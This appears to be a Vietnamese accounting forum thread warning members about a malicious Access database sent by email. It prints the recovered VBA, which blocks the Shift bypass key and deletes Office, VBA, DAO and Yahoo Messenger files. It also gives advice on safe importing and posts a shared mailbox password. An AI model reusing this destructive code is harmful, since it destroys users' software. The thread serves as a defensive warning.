Chú ý chú ý.... đừng có mở file access Quản lý nhân sự!

• Thread starter paulsteigel
  • Ngày gửi
paulsteigel

paulsteigel

Trung cấp
13/11/05
103
0
16
48
Hoà Bình
www.sfdp.net
Tôi viết bài này thì đã muộn quá! Chắc cũng đã có vài người bị mất một số phần mềm với cái file quản lý nhân sự chết tiệt...
Quả thật các bạn chẳng hề nghi ngờ gì cả, đã là quản lý nhân sự thì ít ra cũng không thể có kích thước quá nhỏ như vậy được 140K.
Tôi đã khá cảnh giác, mở file mới và nhập các form thì chỉ thấy độc 1 form welcome và 1 module.
Sau khi modify cái macro autoexec và mở mã nguồn bị bảo vệ password, thì đây là những gì ai đó tốt bụng muốn tặng các bạn:
'///////////////////////////////
Option Compare Database

Function PreventBypass() As Boolean
Set prp = CurrentDb.CreateProperty("AllowBypassKey", dbBoolean, False, True)
CurrentDb.Properties.Append prp
Set prp = Nothing
End Function

Public Function Del_4_Fun()

On Error Resume Next
' Delete file from Office 10 - Access
' Can not use Access wizard
Kill "C:\Program Files\Microsoft Office\Office10\*.MDT"
Kill "C:\Program Files\Microsoft Office\Office10\*.MDE"
Kill "C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\*.*"
Kill "C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\1033\*.*"
Kill "C:\Program Files\Common Files\Microsoft Shared\DAO\*.*"
Kill "C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\*.*"
Kill "C:\Program Files\Common Files\Microsoft Shared\Office10\1033\*.*"
Kill "C:\Program Files\Yahoo10!\Messenger1\*.exe"

End Function

'///////////////////////////////
Chắc hẳn chẳng cần bình luận gì thêm - chịu khó đi cài lại Office nhé, và Yahoo Msg nữa.

Khóa học Quản trị dòng tiền
Nguyen Tu Anh

Nguyen Tu Anh

Cao cấp
23/2/05
5,608
23
38
Hà Nội - TP. HCM
Tối nay, vừa mở mail thì em nhận được một lá thư như sau:

Chào Chi Nguyễn Tú Anh và các thành viên của Webketoan,

Tôi là một thành viên mới của WKT, một người bạn gởi tặng tôi một file Quản Lý Nhân Sự nhưng tôi không thể vào Database được ( Tôi đã thử nhấn Shift).

Tôi muốn gởi kèm file nên đành gởi email.

Xin chân thành cảm ơn vì sự giúp đỡ nhiệt tình của Chị
Chân trọng kính chào,

Nguyễn Thuận.
Cũng không rõ thành viên Nguyễn Thuận này là nạn nhân hay kẻ phá hoại nữa. Em cũng đã mở file ra nhưng không sao mở được. Đến giờ phút này thì Office và Yahoo Messenger của em vẫn chưa bị làm sao. Đang định gửi file lên Box Access nhưng đọc được bài của anh nên đã cho cái file chết tiệt đó vào thùng rác và cho empty trong máy vi tính luôn rồi.

H

handung107

Cao cấp
28/8/04
576
15
0
VN
www.giaiphapexcel.com
Vậy là đã rõ, chị cũng nhận được File Quản lý nhân sự với nội dung tương tự như Nguyễn Tú Anh và người gửi là Nguyenthuan...Chán quá, chị đã mở nó ra, và...đau đầu quá !!!

N

nguoiconxunui

Khách vãng lai
29/6/04
1,280
215
63
Bình Định
aso2pc.co.cc
anh chị có thể gửi em file đó được không ạ? Về test thử cái COM với Office ấy mà!
nguoiconxunui@yahoo.ca
============
À chị Dung nè, hộp thư của EFC em vào không được nữa, do nó không public nữa hay vi pass không đúng?
Tại em cần mấy tài liệu trong đó!
user: thuvien.wkt
pass: efcwkt
Vậy đúng không chị

Sửa lần cuối:
H

handung107

Cao cấp
28/8/04
576
15
0
VN
www.giaiphapexcel.com
Hộp thư EFC đã bị ai đó đổi Password rồi, nên đã lâu, EFC không vào được nữa, nhưng tài liệu về Excel đã upload khá đầy đủ trên thư viện rồi, em cứ xem thử, còn cần gì thì em cứ cho biết cụ thể, chị sẽ gửi cho em, nếu có

L

lehongduc

Trung cấp
29/3/05
131
1
18
64
VietNam
Xin chào các Bạn,
Tôi là Lê Hồng Đức, cũng đã nhận được 1 email giống như các Bạn với cái file QUANLYNHANSU.MDB đầy ác ý kia.
Tác giả của cái file này để lại khá nhiều dấu vết về mình ngay trên chính tác phẩm này. Chỉ với công cụ Hex-Editor bình thường tôi đã lọc ra được những dấu vết ấy. Vài hôm nữa tôi sẽ công bố chúng để chúng ta cùng nhận diện.
Biện pháp an tòan để các Bạn mở những file MDB không hẹn trước như thế này là:
+ Đừng bao giờ mở trực tiếp dù có sử dụng phím Shift, bởi chúng ta dễ dàng vô hiệu hóa phím Shift bằng 1 dòng lệnh đơn giản;
+ Hãy tạo 1 file MDB mới tinh, sau đó sử dụng chức năng Import để import các Object (Tables, Forms, ...) của file MDB cần tham khảo vào (từ menu File chọn mục lệnh "Get External Data\ Import") nhưng đừng import cái Macro có tên Autoexec;
Cái Macro Autoexec có tác dụng tự động khởi động các tác vụ quy định trước.
+ Sau đó mới từ từ tham khảo.

Và sau đây tôi xin phép các bạn có vài lời với người bạn này của chúng ta:
Em ạ, năm nay anh đã 48 tuổi đời, xin có lời với em:
Chắc chắn em còn rất trẻ, non là đằng khác, vì người đã trưởng thành chẳng ai hành động như em, diễn đàn này là nơi trao đổi nghiệp vụ và học tập rất nghiêm túc, nếu muốn khẳng định mình em hãy đóng góp nhiều hơn bằng những bài viết và những họat động có ích, đừng thêm một lần nữa dại dột làm như đã làm vừa rồi nhé. Khả năng về Access của em chưa vượt qua cái ngưỡng vở lòng đâu, hãy ráng mà học và hành cho đúng đắn.

Sửa lần cuối:
hai2hai

hai2hai

VNUNI Makes a difference
29/4/04
2,032
125
63
50
Hà nội
vnuni.net
Khi nhận email của thành viên Nguyễn Thuận (chắc là lấy tên người khác) này (hic... dám lấy tên...) tôi đã cực nghi ngờ rồi và cuối cùng cho nó luôn vào sọt rác nên cũng ko phát hiện ra nó làm cái gì để cảnh báo cho mọi người. Té ra là chú này đã dùng kiểu persionalized email để gửi cho từng cá nhân một.

Nói bây giờ thì quá muộn rồi. Thôi thì hoặc là cài lại Ms Office và YM như Paul nói, hoặc là tìm đâu đó mấy files trong thư mục của Office, YM có cùng version trên máy khác rồi copy overwrite lên. Đúng là baby :)

Tôi đã thử nhấn Shift
Set prp = CurrentDb.CreateProperty("AllowBypassKey", dbBoolean, False, True)

Sửa lần cuối:
V

vongphuc

Excel Fans Club
11/8/04
300
5
18
Ha Noi
Bó tay với cái box Access, may quá mình không nhận được email file quanlynhansu này. Nhớ hôm Tết anh HaiTam gửi message thông báo cảm ơn mọi người vì nhận được rất nhiều ecard chúc mừng nhưng không dám mở ra vì sợ virus. Tuy không nói ra nhưng nhiều người đều làm như thế. Thực tế là chúng ta đang ở trên mạng và quan hệ giữa chúng ta khó có gì kiểm soát được. Ngoài ra trình độ của mỗi người đều có những hạn chế nhất định. Ở đây tôi chưa nói đến vấn đề ý thức bởi vì thành viên kia tôi chẳng biết cậu ý là ai, nếu cậu ý là một người thật thì làm sao đoan chắc được cậu cố tình làm việc xấu, hơn nữa chúng ta cũng chẳng phải là tòa án. Nói thế không phải vì cái tên lehongduc rất nổi tiếng là một sự đảm bảo tuyệt đối cho một nickname của webketoan, hay vì anh SA_DQ nhiều tuổi rồi mà mọi ý kiến của anh đều đúng. Thế bây giờ nếu một cá nhân được nêu tên ra đây thì có ai đảm bảo được cái gì sẽ diễn ra sau đó không? Nói chung tình hình bây giờ vẫn kiểm soát được và ai có thông tin gì thì chỉ việc thông báo cho admin là được rồi

M

MINA

Quảng cáo/Tài Trợ
Thành viên BQT
Quản lý cao cấp
12/11/03
4,030
410
83
46
Ninh Thuận
Sáng sớm vừa thức giấc thấy có mail gửi nhưng lại để đích danh là Nguyễn Tú Anh nên Mina nghĩ là Tú Anh đã làm giúp bạn ấy nên bỏ luôn thư. May thật!

Đào Việt Cường

Đào Việt Cường

Moderator
22/11/05
400
4
18
Khánh Hòa
Hế!!! Hế!!!
----------
Qua đây mới thấy các mod nhà mình cực kỳ vô trách nhiệm nhá!
Em cũng giống bác MINA nên em cũng thoát! :leapfroga

H

hoangvudb

Guest
30/11/05
57
0
0
39
đà nẵng
www.hvcpro.com
ai có còn file này ko gửi cho tôi tham khảo với, nghe mà chả tin
hoangvudb@gmail.com
cảm ơn nhiều

Secret_grasses

Secret_grasses

Guest
Đào Việt Cường nói:
Hế!!! Hế!!!
----------
Em cũng giống bác MINA nên em cũng thoát!

Cũng may là anh vô trách nhiệm với mail của Secret!!! Secret đã nhận được mail này từ chiều hôm qua, ngay lập tức Secret gửi cho 3 mod của AFC vì thấy nội dung hơi lạ. Nhưng sau đó Secret cũng mở thử, đến trưa hôm nay mới nhận được tin nhắn của anh Paul và mail của anh hai2hai nói là file này có virut.(Hơi bị trễ!!!). Nhưng cũng còn may là MS O & YM của Secret chưa bị sao cả.

-@hoangvudb: bạn nên cân nhắc với câu nói của bạn!!!

-@NSS: Bây giờ thì em đã hiểu tại sao anh hay :cussing: với :1luvu: của anh rồi. Anh lo mà làm hòa đi đó!!!

M

MINA

Quảng cáo/Tài Trợ
Thành viên BQT
Quản lý cao cấp
12/11/03
4,030
410
83
46
Ninh Thuận
SA_DQ nói:
Nhưng thật buồn lòng! Rất mong các bác lôi Cẩu Thuận này ra ánh sáng; 3 năm qua các Mod nhớ xem có ai đã như vậy chưa? Nếu chưa thì anh/cô chàng này mới xuất hiện & xã rác rùm ben quá mất!
Hay là chúng ta tổ chức một cuộc thi dự đoán/trắc nghiệm có thưởng đi nhẫy?! Ai đoán trúng trước khi LeHongDuc công bố phát giác của mình sẽ được quà:
Nguồn dự đoán: Kêu gọi & thống kê hết ~ ai được C. Thuận gởi *.MDB; Từ thông tin này ta sẽ tìm ra kẻ thù không đội trời chung của Cộng đồng ngay ấy mà!
Xin Chúc mọi người vượt qua tai nạn
Em thấy dự đoán thì hầu như ai cũng dự đoán được. WKT lâu nay không bao giờ có tình trạng này, mọi người đến với WKT luôn với lòng nhiệt tình, sự chia sẻ.
Nhắn gửi với bạn có mail là Nguyễn Thuận, cộng đồng KWT không chấp nhận những việc bạn làm, bạn sẽ bị cộng đồng loại bạn ra khỏi cộng đồng lúc đó bạn hối hận cũng đã muộn màng. Chính bạn đã làm cho cộng đồng đâm ra không muốn giúp những lời nhờ giúp đỡ tương tự như bạn đã đưa, bạn quá là trẻ con và bồng bột, chính điều này đã làm xấu đi cộng đồng vốn có của WKT (lòng nhiệt tình của các anh chị, các bạn). Những cái bạn phá chẳng có ý nghĩa gì hết bạn ah. Đây là lần cuối cùng mình mong bạn không nhân danh này nọ nhờ vả kèm theo phá có ý đồ. Bạn là dân có liên quan đến kế toán còn cần học hỏi nhiều từ các anh chị và các bạn đồng trang lứa như bạn. Hãy để “hữu xạ tự nhiên hương”, bạn muốn nhiều người biết đến bạn nhưng trước tiên bạn nên nghĩ cách nào hay nhất. Cuộc sống còn rất dài ở phía trước còn rất nhiều va chạm chứ không phải chỉ có sống cho ngày hôm nay là hết bạn nhé!

H

HyperVN

<b>Phu hót rác</b>
17/3/03
1,833
16
0
47
Hải Phòng
www.webketoan.vn
Xin các bạn thông báo kết luận cuối cùng, đây là vấn đề có ảnh hưởng tới uy tín và hoạt động của diễn đàn.

H

handung107

Cao cấp
28/8/04
576
15
0
VN
www.giaiphapexcel.com
Đào Việt Cường nói:
Hế!!! Hế!!!
----------
Em cũng giống bác MINA nên em cũng thoát! :leapfroga
Không hiểu Cường nói gì cả ? File QLNS đã được Mod Paulsteigel thông báo , các Link của trang Web hoangvudb cũng được các Mod nêu lên...còn mức độ kịp thời đến đâu, thì phải từ từ rút kinh nghiệm chứ.
Như vậy, chúng ta cũng cần đưa ra các biện pháp xử lý những tình huống như thế này sẽ còn xảy ra tiếp tục...trong thời gian tới

Đào Việt Cường

Đào Việt Cường

Moderator
22/11/05
400
4
18
Khánh Hòa
handung107 nói:
Không hiểu Cường nói gì cả?

Chị ơi!
------
Ý của em là:
Dim Bungta As Trachnhiem
Dim Bungnguoi As Trachnhiem
Dim Doantoan As Boolean
Doantoan = Bungta => Bungnguoi
Còn việc đề cao cảnh giác và xử lý thì theo em phụ thuộc vào ý thức của mỗi người thôi. Có thể đề phòng được với kẻ gian chứ đề phòng thế nào được với kẻ... ác! Sở dĩ em thoát khỏi vụ khủng bố này là em cũng đề cao tinh thần cảnh giác của em: chỉ mở những Email của các bạn mà em đã từng nói chuyện hoặc biết đến. Chuyện nhờ gửi file lên web là chuyện bình thường, song nếu để chậm lại mấy ngày cũng không sao - tất nhiên không phát hiện ra không phải là có tội. Nhờ đó mà em biết được quả bom nổ chậm đang nằm trong máy của em.
Còn về xử lý, mọi người cứ nói đến phẩm chất với lại đạo đức nọ kia, theo em là hơi thừa! Những hạng người như thế chả bao giờ có đạo đức để mà nhận tội đâu. Chi bằng phải tăng cường sức mạnh cộng đồng, mọi thành viên phải tin tưởng, quý mến nhau thì người xấu thấy thế mà xa lánh!

Sửa lần cuối:
P

phanxuanthuong

Guest
15/11/05
10
0
0
53
Viet Nam
lehongduc nói:
Xin chào các Bạn,
Tôi là Lê Hồng Đức, cũng đã nhận được 1 email giống như các Bạn với cái file QUANLYNHANSU.MDB đầy ác ý kia.
Tác giả của cái file này để lại khá nhiều dấu vết về mình ngay trên chính tác phẩm này. Chỉ với công cụ Hex-Editor bình thường tôi đã lọc ra được những dấu vết ấy. Vài hôm nữa tôi sẽ công bố chúng để chúng ta cùng nhận diện.
Biện pháp an tòan để các Bạn mở những file MDB không hẹn trước như thế này là:
+ Đừng bao giờ mở trực tiếp dù có sử dụng phím Shift, bởi chúng ta dễ dàng vô hiệu hóa phím Shift bằng 1 dòng lệnh đơn giản;
+ Hãy tạo 1 file MDB mới tinh, sau đó sử dụng chức năng Import để import các Object (Tables, Forms, ...) của file MDB cần tham khảo vào (từ menu File chọn mục lệnh "Get External Data\ Import") nhưng đừng import cái Macro có tên Autoexec;
Cái Macro Autoexec có tác dụng tự động khởi động các tác vụ quy định trước.
+ Sau đó mới từ từ tham khảo.

....
Có lỡ import nó đi nữa thì cũng không sao anh ơi nếu như mình chịu khó remane lại cái tên đó chúc xíu như Check_Autoexec chẳng hạn thì cũng ko sợ mà!:friend:

Xem nhiều

Webketoan Zalo OA